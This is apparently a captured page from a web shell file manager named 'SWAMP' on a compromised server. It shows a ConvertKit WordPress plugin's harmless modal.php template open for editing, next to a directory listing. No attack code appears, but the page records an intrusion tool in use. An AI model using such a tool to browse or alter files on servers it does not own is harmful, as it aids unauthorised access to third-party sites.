░▒▓████████████████████████████████▓▒░ ░▒▓█ ▓▒░ ░▒▓█ ~ S W A M P ~ ▓▒░ ░▒▓█ ▓▒░ ░▒▓████████████████████████████████▓▒░
vps.doorgans.com
LOCATION:
/home/fotosel/.trash/wp-content/plugins/convertkit/views/backend/tinymce
☗ ROOT
↻ REFRESH
✎ CARVE FLESH
EDITING: modal.php
<?php /** * TinyMCE Modal view * * @package ConvertKit * @author ConvertKit */ ?> <!-- .wp-core-ui ensures styles are applied on frontend editors for e.g. buttons.css --> <form class="convertkit-tinymce-popup wp-core-ui"> <?php // Output each Field. foreach ( $shortcode['fields'] as $field_name => $field ) { include 'modal-field-row.php'; } ?> <div class="convertkit-option buttons"> <div class="left"> <button type="button" class="close button"><?php esc_html_e( 'Cancel', 'convertkit' ); ?></button> </div> <div class="right"> <input type="hidden" name="shortcode" value="convertkit_<?php echo esc_attr( $shortcode['name'] ); ?>" /> <?php if ( $shortcode['shortcode_include_closing_tag'] ) { ?> <input type="hidden" name="close_shortcode" value="1" /> <?php } ?> <input type="button" value="<?php esc_html_e( 'Insert', 'convertkit' ); ?>" class="button button-primary right" /> </div> </div> </form>
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📄 modal-field-row.php
PHP
644 B
2022-06-13 07:27
EDIT
📄 modal-field.php
PHP
4.4 KB
2022-06-13 07:27
EDIT
📄 modal-missing.php
PHP
427 B
2022-06-13 07:27
EDIT
📄 modal.php
PHP
962 B
2022-06-13 07:27
EDIT